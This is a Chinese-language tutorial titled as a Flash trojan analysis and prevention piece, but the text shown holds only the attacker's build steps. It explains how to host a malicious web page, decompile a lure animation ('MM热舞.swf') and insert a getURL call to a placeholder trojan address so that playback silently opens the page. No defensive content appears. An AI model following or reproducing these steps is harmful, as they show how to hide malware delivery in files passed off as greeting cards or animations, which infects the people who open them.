Flash木马分析与防范

在网站上观看Flash动画，接收到“好友”发来的一张Flash贺卡，甚至于一个QQ魔法表情，一不留神就中了一个木马！Flash动画木马可以说是无处不在，攻击威力和覆盖面极其广。许多朋友一定想了解Flash木马的原理，想知道攻击者是如何在SWF中插入木马的呢？我们应该怎么样来防范Flash木马呢？

一、制作Flash动画木马的准备

Flash动画木马的原理，是在网页中显示或本地直接播放Flash动画木马时，让Flash自动打开一个网址，而该网址就是我们预先制作好的一个木马网页。也就是说，在制作网页木马前，我们首先需要制作好一个网页木马，并将它放置到某个网站上去。

另外，我们还需要准备一个比较吸引人的Flash动画文件“MM热舞.swf”，以及Flash动画反编译工具“闪客精灵”，编辑工具Macromedia Flash MX。

二、最原始的Flash木马

现在虽然有了许多各种各样的Flash动画木马制作工具，但是为了了解Flash动画木马的最基本原理，有必要从头开始用最原始的方法制作一个Flash木马。

步骤一：反编译SWF动画

首先我们需要将要插入网页木马的Flash动画文件“MM热舞.swf”，反编译成可编辑的.fla格式。运行“闪客精灵”，点击菜单“文件”→“快速打开”命令，指定“MM热舞.swf”文件将其导入。然后点击工具栏上的“导出FLA”命令，将动画导出为“MM热舞.fla”文件。

步骤二：插入网页木马代码

然后运行Flash动画编辑器Macromedia Flash MX，点击菜单“文件”→“打开”，调入刚才保存的fla文件。展开界面下方的“动作/帧”栏，再展开“动作”→“浏览器/网络”项，点击其中的“getURL”命令，在右边窗口中的“URL”里面输入我们的网页木马地址；窗口方式为“_blank”；“变量”设置为“使用GET方式发送”，在下方的代码窗口中将出现“getURL("http://网页木马地址", "_blank", "GET");”。